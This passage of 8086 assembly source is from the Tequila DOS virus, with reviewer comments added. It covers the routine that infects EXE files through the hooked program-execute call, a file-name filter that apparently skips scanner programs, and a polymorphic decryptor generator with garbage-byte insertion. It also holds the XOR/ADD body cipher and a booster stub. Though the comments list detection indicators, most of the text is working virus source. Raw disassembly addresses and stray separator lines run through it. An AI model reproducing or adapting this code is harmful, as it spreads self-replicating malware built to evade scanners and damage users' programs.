MOVE_TO_END_OF_FILE:
|
||
XOR CX,CX
|
||
XOR DX,DX
|
||
MOV AX,04202
|
||
JMP 06B4 ;Masm Mod. Needed
|
||
|
||
||
; MOVE_TO_BEGINNING_OF_FILE - DOS function 4200h with offset 0; falls through into INT_21.
MOVE_TO_BEGINNING_OF_FILE:
|
||
XOR CX,CX
|
||
XOR DX,DX
|
||
MOV AX,04200
|
||
CS MOV BX,W[09A4] ;Masm Mod. Needed
|
||
|
||
||
; INT_21 - simulate an INT 21h to the saved handler: PUSHF + far CALL through 09B4h.
INT_21:
|
||
CLI
|
||
PUSHF
|
||
CS CALL D[09B4] ;Masm Mod. Needed
|
||
RET
|
||
|
||
; INFECT_THE_FILE - called from the INT 21h hook for AX=4B00h; DS:DX is the caller's
; program path. All registers are preserved.
; Steps, in order:
;   1. CHECK_LETTERS_IN_FILENAME - skip the file when it returns carry
;   2. replace the INT 24h (critical error) vector, saving the old one at 09B8h/09BAh
;   3. read the file attributes (saved at 09AAh) and clear them
;   4. open read/write, handle saved at 09A4h
;   5. read the file date/time (saved at 09ACh/09AEh)
;   6. read 1Ch header bytes to 0A49h; continue only if the first word is 5A4Dh ("MZ")
;   7. if the header word at 0A5Bh (header offset 12h) matches one of the 20h words at 0E8h the
;      file is treated as already processed: only the time marker is set
;   8. otherwise READ_PAST_END_OF_FILE and ENCRYPT_AND_WRITE_TO_FILE
;   9. restore date/time, close, restore attributes and the INT 24h vector
; File-level indicators left behind: low five bits of the time stamp all set, and the header
; word at offset 12h equal to one of the table values.
; NOTE(review): numeric call/jump targets are raw disassembly addresses.
INFECT_THE_FILE:
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH ES
|
||
PUSH DS
|
||
CALL CHECK_LETTERS_IN_FILENAME
|
||
JAE GOOD_NAME
|
||
JMP BAD_NAME
|
||
|
||
||
GOOD_NAME:
|
||
PUSH DX
|
||
PUSH DS  ; keep the caller's path pointer
|
||
PUSH CS
|
||
POP DS
|
||
|
||
||
SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:
|
||
MOV AX,03524  ; get INT 24h vector
|
||
CALL INT_21
|
||
MOV W[09B8],BX ;Masm Mod. Needed
|
||
MOV W[09BA],ES ;Masm Mod. Needed
|
||
MOV AX,02524  ; set INT 24h vector to DS:052Ah
|
||
MOV DX,052A
|
||
CALL INT_21
|
||
POP DS
|
||
POP DX  ; DS:DX = path again
|
||
|
||
||
SAVE_AND_REPLACE_FILE_ATTRIBUTE:
|
||
MOV AX,04300  ; get file attributes in CX
|
||
CALL INT_21
|
||
CS MOV W[09AA],CX ;Masm Mod. Needed
|
||
JAE 06FE ;Masm Mod. Needed
|
||
JMP RESTORE_CRIT_HANDLER
|
||
MOV AX,04301  ; set file attributes ...
|
||
XOR CX,CX  ; ... to none
|
||
CALL INT_21
|
||
JB 077C ;Masm Mod. Needed
|
||
|
||
||
OPEN_FILE_FOR_READ_WRITE:
|
||
MOV AX,03D02  ; open, access mode 2 (read/write)
|
||
CALL INT_21
|
||
JB 0771 ;Masm Mod. Needed
|
||
PUSH DX
|
||
PUSH DS  ; keep the path pointer for the attribute restore
|
||
PUSH CS
|
||
POP DS
|
||
MOV W[09A4],AX ;Masm Mod. Needed
|
||
|
||
||
GET_FILEDATE:
|
||
MOV AX,05700  ; get file date (DX) and time (CX)
|
||
CALL 06B4 ;Masm Mod. Needed
|
||
JB 075C ;Masm Mod. Needed
|
||
MOV W[09AC],DX ;Masm Mod. Needed
|
||
MOV W[09AE],CX ;Masm Mod. Needed
|
||
|
||
||
READ_AND_CHECK_EXE_HEADER:
|
||
CALL 06AD ;Masm Mod. Needed
|
||
MOV DX,0A49  ; header buffer
|
||
MOV CX,01C  ; 1Ch bytes
|
||
CALL 069A ;Masm Mod. Needed
|
||
JB 075C ;Masm Mod. Needed
|
||
PUSH DS
|
||
POP ES
|
||
MOV DI,0E8  ; table of 20h words
|
||
MOV CX,020
|
||
CMP W[0A49],05A4D ;Masm Mod. Needed
|
||
JNE 075C ;Masm Mod. Needed
|
||
MOV AX,W[0A5B]  ; header word at offset 12h
|
||
CLD
|
||
REPNE SCASW  ; search the table for that word
|
||
JNE 0754 ;Masm Mod. Needed
|
||
OR W[09AE],01F ;Masm Mod. Needed
|
||
JMP 075C ;Masm Mod. Needed
|
||
CALL READ_PAST_END_OF_FILE
|
||
JB 075C ;Masm Mod. Needed
|
||
CALL ENCRYPT_AND_WRITE_TO_FILE
|
||
|
||
||
RESTORE_ALTERED_DATE:
|
||
MOV AX,05701  ; set file date/time
|
||
MOV DX,W[09AC]
|
||
MOV CX,W[09AE]
|
||
CALL 06B4 ;Masm Mod. Needed
|
||
|
||
||
CLOSE_THE_FILE:
|
||
MOV AH,03E  ; close handle
|
||
CALL 06B4 ;Masm Mod. Needed
|
||
|
||
||
RESTORE_FILE_ATTRIBUTE:
|
||
POP DS
|
||
POP DX  ; DS:DX = path
|
||
MOV AX,04301  ; set file attributes back to the saved value
|
||
CS MOV CX,W[09AA] ;Masm Mod. Needed
|
||
CALL INT_21
|
||
|
||
||
RESTORE_CRIT_HANDLER:
|
||
MOV AX,02524  ; set INT 24h vector back to the saved value
|
||
CS LDS DX,[09B8] ;Masm Mod. Needed
|
||
CALL INT_21
|
||
|
||
||
BAD_NAME:
|
||
POP DS
|
||
POP ES
|
||
POP DI
|
||
POP SI
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
POP AX
|
||
RET
|
||
|
||
; CHECK_LETTERS_IN_FILENAME - file-name filter for the zero-terminated path at DS:DX.
; Out: carry set when the path contains the byte pair 53h,43h ("SC") at any position or the
;      byte 56h ("V") anywhere; carry clear otherwise.
; Clobbers AX, CX, SI, DI and ES (ES is set to DS).
; NOTE(review): presumably meant to leave scanner programs untouched - the code only shows the
; letter test. The comparison is on upper-case byte values only. Jump targets are raw addresses.
CHECK_LETTERS_IN_FILENAME:
|
||
PUSH DS
|
||
POP ES
|
||
MOV DI,DX
|
||
MOV CX,-1
|
||
XOR AL,AL
|
||
CLD
|
||
REPNE SCASB  ; find the terminating zero
|
||
NOT CX  ; CX = path length including the terminator
|
||
MOV DI,DX
|
||
MOV AX,04353  ; AL=53h 'S', AH=43h 'C'
|
||
MOV SI,CX  ; keep the length for the second scan
|
||
SCASW  ; compare the word at ES:DI, DI += 2
|
||
JE 07B7 ;Masm Mod. Needed
|
||
DEC DI  ; net advance of one byte per pass
|
||
LOOP 07A5 ;Masm Mod. Needed
|
||
MOV CX,SI
|
||
MOV DI,DX
|
||
MOV AL,056  ; 'V'
|
||
REPNE SCASB
|
||
JE 07B7 ;Masm Mod. Needed
|
||
CLC  ; name accepted
|
||
RET
|
||
STC  ; name rejected
|
||
RET
|
||
|
||
; READ_PAST_END_OF_FILE - inspects the tail of the open file.
; Seeks with CX:DX = -0Ah and reads 8 bytes to 0A65h. If the first two words are 0FDF0h and
; 0AAC5h it seeks with CX:DX = -9 and writes 4 bytes from 0A6Bh over part of that tail.
; Otherwise returns with carry clear.
; NOTE(review): what the 0FDF0h/0AAC5h pair identifies is not shown in this listing; the seek
; origin depends on the helper at 06A8h, which is a raw disassembly address - confirm both.
READ_PAST_END_OF_FILE:
|
||
MOV CX,-1
|
||
MOV DX,-0A  ; CX:DX = -10
|
||
CALL 06A8 ;Masm Mod. Needed
|
||
MOV DX,0A65  ; buffer
|
||
MOV CX,8  ; 8 bytes
|
||
CALL 069A ;Masm Mod. Needed
|
||
JB RET ;Masm Mod. Needed
|
||
CMP W[0A65],0FDF0 ;Masm Mod. Needed
|
||
JNE 07F0 ;Masm Mod. Needed
|
||
CMP W[0A67],0AAC5 ;Masm Mod. Needed
|
||
JNE 07F0 ;Masm Mod. Needed
|
||
MOV CX,-1
|
||
MOV DX,-9  ; CX:DX = -9
|
||
CALL 06A8 ;Masm Mod. Needed
|
||
MOV DX,0A6B
|
||
MOV CX,4
|
||
CALL 0696 ;Masm Mod. Needed
|
||
RET
|
||
CLC
|
||
RET
|
||
|
||
; ENCRYPT_AND_WRITE_TO_FILE - validates the EXE header buffered at 0A49h against the real file
; length, rewrites header fields, appends the body and finally writes the new header.
; BX = 0A49h, so [BX+n] is header offset n:
;   +02/+04 bytes in last page / page count     +08 header size in paragraphs
;   +0E/+10 initial SS / SP                     +12 checksum word
;   +14/+16 initial IP / CS
; The original IP, CS (+10h) and SS (+10h) are stored at W[0], W[2] and W[4] of the body.
; What changes in the file, from an analyst's view:
;   - length grows by 09A4h bytes (page count / last-page fields recomputed accordingly)
;   - initial CS:IP and SS are changed
;   - header word +12h becomes one of the 20h words at 0E8h, chosen by the low 5 bits of the
;     call counter at 09BCh
;   - the saved time word gets its low five bits set (written back by the caller)
; NOTE(review): W[0B] and W[0D] are multipliers/divisors from the parameter area (presumably
; paragraph and page size); numeric call/jump targets are raw disassembly addresses - confirm.
ENCRYPT_AND_WRITE_TO_FILE:
|
||
CALL MOVE_TO_END_OF_FILE
|
||
MOV SI,AX
|
||
MOV DI,DX  ; DI:SI = file length
|
||
MOV BX,0A49
|
||
MOV AX,W[BX+4]
|
||
MUL W[0D] ;Masm Mod. Needed
|
||
SUB AX,SI
|
||
SBB DX,DI  ; header-declared size minus real length
|
||
JAE 080C ;Masm Mod. Needed
|
||
JMP OUT_OF_ENCRYPT
|
||
MOV AX,W[BX+8]
|
||
MUL W[0B] ;Masm Mod. Needed
|
||
SUB SI,AX
|
||
SBB DI,DX  ; DI:SI = length without the header
|
||
MOV AX,W[BX+0E]
|
||
MOV W[4],AX ;Masm Mod. Needed
|
||
ADD W[4],010 ;Masm Mod. Needed
|
||
MUL W[0B] ;Masm Mod. Needed
|
||
ADD AX,W[BX+010]
|
||
SUB AX,SI
|
||
SBB DX,DI
|
||
JB 083C ;Masm Mod. Needed
|
||
SUB AX,080
|
||
SBB DX,0
|
||
JB RET ;Masm Mod. Needed
|
||
ADD W[BX+0E],09B
|
||
MOV AX,W[BX+016]
|
||
ADD AX,010
|
||
MOV W[2],AX ;Masm Mod. Needed
|
||
MOV AX,W[BX+014]
|
||
MOV W[0],AX ;Masm Mod. Needed
|
||
CALL 06A4 ;Masm Mod. Needed
|
||
ADD AX,09A4
|
||
ADC DX,0  ; new total length
|
||
DIV W[0D] ;Masm Mod. Needed
|
||
INC AX
|
||
MOV W[0A4D],AX ;Masm Mod. Needed
|
||
MOV W[0A4B],DX ;Masm Mod. Needed
|
||
MOV DX,DI
|
||
MOV AX,SI
|
||
DIV W[0B] ;Masm Mod. Needed
|
||
MOV W[0A5F],AX ;Masm Mod. Needed
|
||
MOV BX,DX
|
||
ADD DX,0960
|
||
MOV W[0A5D],DX ;Masm Mod. Needed
|
||
CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE
|
||
JB RET ;Masm Mod. Needed
|
||
OR W[09AE],01F ;Masm Mod. Needed
|
||
MOV BX,W[09BC]
|
||
AND BX,01F
|
||
SHL BX,1  ; word index into the table
|
||
MOV AX,W[BX+0E8]
|
||
MOV W[0A5B],AX ;Masm Mod. Needed
|
||
CALL MOVE_TO_BEGINNING_OF_FILE
|
||
MOV CX,01C
|
||
MOV DX,0A49
|
||
|
||
||
WRITE_THE_NEW_HEADER:
|
||
CALL 0696 ;Masm Mod. Needed
|
||
OUT_OF_ENCRYPT:
|
||
RET
|
||
|
||
; COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE - builds the per-file variable code in the 40h-byte area at
; 0960h and then calls the relocated write routine at 0A04h.
; The BIOS tick count (INT 1Ah, AH=0) supplies both the fill word for the area and the starting
; value of BP; the ENCRYPT_STEP_* routines and GARBLER then read bytes at ES:[BP] with ES=0,
; i.e. low-memory contents, to make their choices.
; Consequence for detection: the area at 0960h differs from file to file, so a fixed byte
; signature over it is unreliable; structural markers (header word, time stamp, size delta)
; are the stable indicators.
; BX is expected to hold the value computed by the caller; BP is preserved.
COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:
|
||
PUSH BP
|
||
XOR AH,AH
|
||
INT 01A  ; CX:DX = BIOS tick count
|
||
MOV AX,DX
|
||
MOV BP,DX
|
||
PUSH DS
|
||
POP ES
|
||
MOV DI,0960
|
||
MOV SI,DI  ; SI = write position for generated bytes
|
||
MOV CX,020
|
||
CLD
|
||
REP STOSW  ; fill 20h words at 0960h with the tick value
|
||
XOR DX,DX
|
||
MOV ES,DX  ; ES = 0 for the ES:[BP] reads
|
||
CALL ENCRYPT_STEP_ONE
|
||
CALL ENCRYPT_STEP_TWO
|
||
CALL ENCRYPT_STEP_THREE
|
||
MOV B[SI],0E9  ; near JMP opcode
|
||
MOV DI,028C
|
||
SUB DI,SI
|
||
SUB DI,3  ; displacement from the end of the JMP to offset 028Ch
|
||
INC SI
|
||
MOV W[SI],DI
|
||
MOV AX,0A04
|
||
CALL AX  ; relocated routine at 0A04h
|
||
POP BP
|
||
RET
|
||
|
||
; ENCRYPT_STEP_ONE - writes one of two byte sequences at [SI], selected by bit 1 of the byte
; at ES:[BP] (after BP is decremented): either the bytes 0Eh, 1Fh or the words 0CB8Ch, 0DB8Eh.
; GARBLER is called after each piece and may insert filler bytes.
; SI advances past everything written; BP moves down as bytes are consumed.
; NOTE(review): 08EBh is a raw disassembly address, presumably the second sequence below.
ENCRYPT_STEP_ONE:
|
||
DEC BP
|
||
ES TEST B[BP],2 ;Masm Mod. Needed
|
||
JNE 08EB ;Masm Mod. Needed
|
||
MOV B[SI],0E
|
||
INC SI
|
||
CALL GARBLER
|
||
MOV B[SI],01F
|
||
INC SI
|
||
CALL GARBLER
|
||
RET
|
||
MOV W[SI],0CB8C
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
MOV W[SI],0DB8E
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
RET
|
||
|
||
; ENCRYPT_STEP_TWO - writes three 3-byte groups at [SI]: opcode byte 0BEh and opcode byte 0BBh,
; each followed by a word taken from BX, and opcode byte 0B9h followed by the word 0960h.
; Bit 0 of CH records a choice made from bit 1 of ES:[BP]; it decides the order of the first
; two groups and which of them receives BX+0960h. ENCRYPT_STEP_THREE reads the same CH bit.
; GARBLER is called between the groups.
; NOTE(review): numeric jump targets are raw disassembly addresses; the control flow between
; the two groups is inferred from instruction order - confirm.
ENCRYPT_STEP_TWO:
|
||
AND CH,0FE  ; clear the order flag
|
||
DEC BP
|
||
ES TEST B[BP],2 ;Masm Mod. Needed
|
||
JE 0920 ;Masm Mod. Needed
|
||
OR CH,1  ; set the order flag
|
||
MOV B[SI],0BE
|
||
INC SI
|
||
MOV W[SI],BX
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
ADD BX,0960
|
||
TEST CH,1
|
||
JE 0934 ;Masm Mod. Needed
|
||
MOV B[SI],0BB
|
||
INC SI
|
||
MOV W[SI],BX
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
ADD BX,0960
|
||
TEST CH,1
|
||
JE 090C ;Masm Mod. Needed
|
||
SUB BX,0960
|
||
CALL GARBLER
|
||
MOV B[SI],0B9
|
||
INC SI
|
||
MOV AX,0960
|
||
MOV W[SI],AX
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
CALL GARBLER
|
||
RET
|
||
|
||
; ENCRYPT_STEP_THREE - writes the remaining generated bytes at [SI] and records the chosen
; byte operation in B[0A39].
; Visible facts:
;   - a two-byte group starting with 08Ah; its second byte is 14h or 17h depending on bit 0 of CH
;   - a two-byte group whose first byte is 00h or 30h (bit 1 of ES:[BP]); B[0A39] is set to 28h
;     in the first case and 30h in the second
;   - the fixed word 04346h
;   - a group 81h,0FEh/0FBh + word (BX+40h), byte 72h + a displacement filled in afterwards,
;     byte 0BEh/0BBh + word BX, and byte 0E2h + a backwards displacement to the position saved in DI
;   - GARBLER is called between the groups
; B[0A39] is read by MAKE_THE_DISK_WRITE. NOTE(review): 0A39h presumably lies inside the
; relocated copy of the transform routine, i.e. this patches an opcode byte - confirm.
; NOTE(review): numeric jump targets are raw disassembly addresses.
ENCRYPT_STEP_THREE:
|
||
MOV AH,014
|
||
MOV DH,017
|
||
TEST CH,1
|
||
JE 0958 ;Masm Mod. Needed
|
||
XCHG DH,AH
|
||
MOV DI,SI  ; remember where this group starts
|
||
MOV AL,08A
|
||
MOV W[SI],AX
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
XOR DL,DL
|
||
MOV B[0A39],028 ;Masm Mod. Needed
|
||
DEC BP
|
||
ES TEST B[BP],2 ;Masm Mod. Needed
|
||
JE 0978 ;Masm Mod. Needed
|
||
MOV DL,030
|
||
MOV B[0A39],DL ;Masm Mod. Needed
|
||
MOV W[SI],DX
|
||
INC SI
|
||
INC SI
|
||
MOV W[SI],04346
|
||
INC SI
|
||
INC SI
|
||
CALL GARBLER
|
||
MOV AX,0FE81
|
||
MOV CL,0BE
|
||
TEST CH,1
|
||
JE 0993 ;Masm Mod. Needed
|
||
MOV AH,0FB
|
||
MOV CL,0BB
|
||
MOV W[SI],AX
|
||
INC SI
|
||
INC SI
|
||
PUSH BX
|
||
ADD BX,040
|
||
MOV W[SI],BX
|
||
INC SI
|
||
INC SI
|
||
POP BX
|
||
MOV B[SI],072
|
||
INC SI
|
||
MOV DX,SI  ; position of the displacement byte, filled in below
|
||
INC SI
|
||
CALL GARBLER
|
||
MOV B[SI],CL
|
||
INC SI
|
||
MOV W[SI],BX
|
||
INC SI
|
||
INC SI
|
||
MOV AX,SI
|
||
SUB AX,DX
|
||
DEC AX  ; distance from the displacement byte to here
|
||
MOV BX,DX
|
||
MOV B[BX],AL
|
||
CALL GARBLER
|
||
CALL GARBLER
|
||
MOV B[SI],0E2
|
||
INC SI
|
||
SUB DI,SI
|
||
DEC DI  ; backwards displacement to the saved start
|
||
MOV AX,DI
|
||
MOV B[SI],AL
|
||
INC SI
|
||
CALL GARBLER
|
||
RET
|
||
|
||
; GARBLER - optionally writes one filler item at [SI], driven by bytes read at ES:[BP].
; If the low four bits of the first byte are all zero nothing is written. Otherwise bits
; 1, 2 and 3 of the next byte select among: the word 0C789h, the single byte 90h, a two-byte
; item starting with 84h/85h, a two-byte item starting with 39h, or the single byte 0FCh.
; SI advances past whatever was written; BP moves down by one per byte consumed.
; Detection note: these fillers change the length and layout of the generated area from one
; file to the next.
; NOTE(review): numeric jump targets and "JMP RET" are kept from the disassembly; the mapping
; of bit tests to items is inferred from instruction order - confirm.
GARBLER:
|
||
DEC BP
|
||
ES TEST B[BP],0F ;Masm Mod. Needed
|
||
JE RET ;Masm Mod. Needed
|
||
DEC BP
|
||
ES MOV AL,B[BP] ;Masm Mod. Needed
|
||
TEST AL,2
|
||
JE 0A0E ;Masm Mod. Needed
|
||
TEST AL,4
|
||
JE 09F7 ;Masm Mod. Needed
|
||
TEST AL,8
|
||
JE 09F1 ;Masm Mod. Needed
|
||
MOV W[SI],0C789
|
||
INC SI
|
||
INC SI
|
||
JMP RET ;Masm Mod. Needed
|
||
MOV B[SI],090
|
||
INC SI
|
||
JMP RET ;Masm Mod. Needed
|
||
MOV AL,085
|
||
DEC BP
|
||
ES MOV AH,B[BP] ;Masm Mod. Needed
|
||
TEST AH,2
|
||
JE 0A05 ;Masm Mod. Needed
|
||
DEC AL
|
||
OR AH,0C0
|
||
MOV W[SI],AX
|
||
INC SI
|
||
INC SI
|
||
JMP RET ;Masm Mod. Needed
|
||
DEC BP
|
||
ES TEST B[BP],2 ;Masm Mod. Needed
|
||
JE 0A1A ;Masm Mod. Needed
|
||
MOV AL,039
|
||
JMP 09F9 ;Masm Mod. Needed
|
||
MOV B[SI],0FC
|
||
INC SI
|
||
RET
|
||
|
||
; MAKE_THE_DISK_WRITE - transforms the body in memory, writes 09A4h bytes from DS:0 to the
; handle stored at 09A4h through the saved INT 21h handler, then transforms the body again.
; The write is a far call through the pointer at 09B4h, not an INT instruction.
; Returns the flags of (bytes written - bytes requested), or carry from a failed write.
; NOTE(review): the test and store on B[0A39] sit between the two transform calls; what that
; byte is (presumably an opcode byte of the relocated transform loop) is not shown here.
; Numeric jump targets are raw disassembly addresses.
MAKE_THE_DISK_WRITE:
|
||
CALL PERFORM_ENCRYPTION_DECRYPTION
|
||
MOV AH,040  ; DOS: write
|
||
MOV BX,W[09A4]  ; file handle
|
||
MOV DX,0  ; buffer = DS:0
|
||
MOV CX,09A4  ; byte count
|
||
PUSHF
|
||
CALL D[09B4] ;Masm Mod. Needed
|
||
JB 0A37 ;Masm Mod. Needed
|
||
SUB AX,CX
|
||
PUSHF  ; keep the result flags across the second transform
|
||
CMP B[0A39],028 ;Masm Mod. Needed
|
||
JNE 0A44 ;Masm Mod. Needed
|
||
MOV B[0A39],0 ;Masm Mod. Needed
|
||
CALL PERFORM_ENCRYPTION_DECRYPTION
|
||
POPF
|
||
RET
|
||
|
||
; PERFORM_ENCRYPTION_DECRYPTION - byte-wise transform of the 0960h bytes at DS:0.
; Each byte is combined (XOR as listed) with a byte from the 40h-byte area 0960h..099Fh, which
; is used cyclically. Because that area holds the per-file generated bytes, the transformed
; body differs between files.
; Clobbers BX, CX, DL, SI.
; NOTE(review): numeric jump/loop targets are raw disassembly addresses.
PERFORM_ENCRYPTION_DECRYPTION:
|
||
MOV BX,0  ; position in the body
|
||
MOV SI,0960  ; position in the 40h-byte area
|
||
MOV CX,0960  ; byte count
|
||
MOV DL,B[SI]
|
||
XOR B[BX],DL
|
||
INC SI
|
||
INC BX
|
||
CMP SI,09A0  ; end of the area?
|
||
JB 0A61 ;Masm Mod. Needed
|
||
MOV SI,0960  ; wrap around
|
||
LOOP 0A52 ;Masm Mod. Needed
|
||
RET
|
||
|
||
; THE_FILE_DECRYPTING_ROUTINE - fixed-form version of the restore loop: sets DS=CS, then adds
; to each of 0960h bytes starting at offset 4 a byte from the 40h-byte area 0964h..09A3h
; (used cyclically), and finally jumps to 0390h.
; NOTE(review): the offsets here are 4 higher than in PERFORM_ENCRYPTION_DECRYPTION, presumably
; because of a different load offset; 0390h is a raw disassembly address - confirm both.
THE_FILE_DECRYPTING_ROUTINE:
|
||
PUSH CS
|
||
POP DS
|
||
MOV BX,4  ; position in the body
|
||
MOV SI,0964  ; position in the 40h-byte area
|
||
MOV CX,0960  ; byte count
|
||
MOV DL,B[SI]
|
||
ADD B[BX],DL
|
||
INC SI
|
||
INC BX
|
||
CMP SI,09A4  ; end of the area?
|
||
JB 0A7E ;Masm Mod. Needed
|
||
MOV SI,0964  ; wrap around
|
||
LOOP 0A6F ;Masm Mod. Needed
|
||
JMP 0390 ;Masm Mod. Needed
|
||
|
||
;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========
|
||
;========== BUT IS MERELY THE BOOSTER. ========
|
||
|
||
; START - booster stub of this listing (the banner comment above marks it as not part of the
; virus body). It stores the offset of EXIT at 0104h and a zero segment word at 0106h
; (CS - CS), which INSTALL later relocates and uses as the far address to jump to, then
; enters INSTALL. The net effect in this build is that the "host" is just the INT 20h at EXIT.
START:
|
||
LEA W[0104],EXIT ;Masm Mod. Needed
|
||
MOV W[0106],CS ;Masm Mod. Needed
|
||
MOV BX,CS
|
||
SUB W[0106],BX ;Masm Mod. Needed
|
||
JMP INSTALL
|
||
|
||
||
EXIT:
|
||
INT 020  ; DOS: terminate program
|
||
|
||
||
TEQUILA ENDP
|
||
CODE_SEG ENDS
|
||
END TEQUILA |